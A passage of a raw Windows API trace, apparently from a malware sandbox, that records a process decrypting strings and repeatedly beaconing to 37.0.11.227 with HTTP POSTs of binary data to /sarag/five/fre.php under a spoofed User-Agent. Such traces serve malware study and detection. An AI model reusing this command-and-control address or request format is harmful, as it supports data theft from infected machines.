0x690000 [0312.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0312.733] send (s=0xa94, buf=0x6ad508*, len=242, flags=0) returned 242 [0312.734] send (s=0xa94, buf=0x6aba40*, len=159, flags=0) returned 159 [0312.734] GetProcessHeap () returned 0x690000 [0312.734] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0312.734] recv (in: s=0xa94, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0312.813] GetProcessHeap () returned 0x690000 [0312.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0312.814] GetProcessHeap () returned 0x690000 [0312.815] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0312.815] GetProcessHeap () returned 0x690000 [0312.815] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0312.815] GetProcessHeap () returned 0x690000 [0312.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0312.817] closesocket (s=0xa94) returned 0 [0312.818] GetProcessHeap () returned 0x690000 [0312.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0312.818] GetProcessHeap () returned 0x690000 [0312.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0312.818] GetProcessHeap () returned 0x690000 [0312.819] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0312.819] GetProcessHeap () returned 0x690000 [0312.819] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0312.819] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x168c) returned 0xa94 [0312.821] Sleep (dwMilliseconds=0xea60) [0312.822] GetProcessHeap () returned 0x690000 [0312.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0312.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.823] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.829] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0312.834] GetProcessHeap () returned 0x690000 [0312.834] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0312.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.835] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0312.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.836] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.837] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.837] GetProcessHeap () returned 0x690000 [0312.837] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0312.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.845] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0312.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.846] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0312.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.847] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0312.847] GetProcessHeap () returned 0x690000 [0312.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0312.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.848] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.849] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.850] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.850] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.850] GetProcessHeap () returned 0x690000 [0312.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0312.850] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0312.851] GetProcessHeap () returned 0x690000 [0312.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0312.851] GetProcessHeap () returned 0x690000 [0312.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0312.852] GetProcessHeap () returned 0x690000 [0312.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0312.852] GetProcessHeap () returned 0x690000 [0312.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0312.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.853] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.858] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0312.863] GetProcessHeap () returned 0x690000 [0312.863] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0312.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.864] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0312.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.864] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.865] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.865] GetProcessHeap () returned 0x690000 [0312.866] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0312.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.867] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0312.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.868] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0312.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0312.868] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0312.868] GetProcessHeap () returned 0x690000 [0312.868] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0312.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.869] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0312.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.870] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0312.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.871] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0312.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.872] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0312.872] GetProcessHeap () returned 0x690000 [0312.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0312.872] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0312.872] GetProcessHeap () returned 0x690000 [0312.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0312.872] socket (af=2, type=1, protocol=6) returned 0xa98 [0312.872] connect (s=0xa98, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0312.907] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0312.907] GetProcessHeap () returned 0x690000 [0312.907] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0312.907] GetProcessHeap () returned 0x690000 [0312.907] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0312.908] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0312.908] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0312.908] GetProcessHeap () returned 0x690000 [0312.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0312.909] GetProcessHeap () returned 0x690000 [0312.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0312.909] GetProcessHeap () returned 0x690000 [0312.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0312.909] GetProcessHeap () returned 0x690000 [0312.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0312.910] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0312.910] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0312.910] GetProcessHeap () returned 0x690000 [0312.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0312.910] GetProcessHeap () returned 0x690000 [0312.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0312.911] send (s=0xa98, buf=0x6ad508*, len=242, flags=0) returned 242 [0312.912] send (s=0xa98, buf=0x6aba40*, len=159, flags=0) returned 159 [0312.912] GetProcessHeap () returned 0x690000 [0312.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0312.912] recv (in: s=0xa98, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0312.986] GetProcessHeap () returned 0x690000 [0312.987] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0312.988] GetProcessHeap () returned 0x690000 [0312.988] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0312.988] GetProcessHeap () returned 0x690000 [0312.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0312.989] GetProcessHeap () returned 0x690000 [0312.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0312.989] closesocket (s=0xa98) returned 0 [0312.989] GetProcessHeap () returned 0x690000 [0312.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0312.990] GetProcessHeap () returned 0x690000 [0312.990] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0312.990] GetProcessHeap () returned 0x690000 [0312.991] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0312.991] GetProcessHeap () returned 0x690000 [0312.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0312.992] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1688) returned 0xa98 [0313.003] Sleep (dwMilliseconds=0xea60) [0313.004] GetProcessHeap () returned 0x690000 [0313.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0313.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.005] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.013] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0313.018] GetProcessHeap () returned 0x690000 [0313.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0313.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.019] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0313.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.020] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.021] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.021] GetProcessHeap () returned 0x690000 [0313.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0313.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.022] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0313.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.023] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0313.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.024] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0313.024] GetProcessHeap () returned 0x690000 [0313.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0313.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.025] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0313.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.026] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0313.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.026] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0313.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.027] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0313.027] GetProcessHeap () returned 0x690000 [0313.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0313.027] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0313.028] GetProcessHeap () returned 0x690000 [0313.028] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0313.028] GetProcessHeap () returned 0x690000 [0313.029] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0313.029] GetProcessHeap () returned 0x690000 [0313.029] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0313.029] GetProcessHeap () returned 0x690000 [0313.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0313.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.030] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.035] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0313.039] GetProcessHeap () returned 0x690000 [0313.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0313.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.040] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0313.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.041] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.042] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.042] GetProcessHeap () returned 0x690000 [0313.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0313.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.043] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0313.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.044] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0313.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.045] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0313.045] GetProcessHeap () returned 0x690000 [0313.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0313.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.046] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0313.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.049] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0313.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.049] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0313.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.050] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0313.050] GetProcessHeap () returned 0x690000 [0313.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0313.050] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0313.050] GetProcessHeap () returned 0x690000 [0313.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0313.050] socket (af=2, type=1, protocol=6) returned 0xa9c [0313.051] connect (s=0xa9c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0313.076] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0313.076] GetProcessHeap () returned 0x690000 [0313.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0313.076] GetProcessHeap () returned 0x690000 [0313.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0313.077] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0313.077] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0313.077] GetProcessHeap () returned 0x690000 [0313.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0313.077] GetProcessHeap () returned 0x690000 [0313.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0313.078] GetProcessHeap () returned 0x690000 [0313.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0313.078] GetProcessHeap () returned 0x690000 [0313.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0313.079] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0313.079] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0313.079] GetProcessHeap () returned 0x690000 [0313.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0313.079] GetProcessHeap () returned 0x690000 [0313.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0313.080] send (s=0xa9c, buf=0x6ad508*, len=242, flags=0) returned 242 [0313.080] send (s=0xa9c, buf=0x6aba40*, len=159, flags=0) returned 159 [0313.080] GetProcessHeap () returned 0x690000 [0313.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0313.080] recv (in: s=0xa9c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0313.155] GetProcessHeap () returned 0x690000 [0313.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0313.156] GetProcessHeap () returned 0x690000 [0313.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0313.156] GetProcessHeap () returned 0x690000 [0313.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0313.156] GetProcessHeap () returned 0x690000 [0313.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0313.157] closesocket (s=0xa9c) returned 0 [0313.157] GetProcessHeap () returned 0x690000 [0313.157] HeapFree 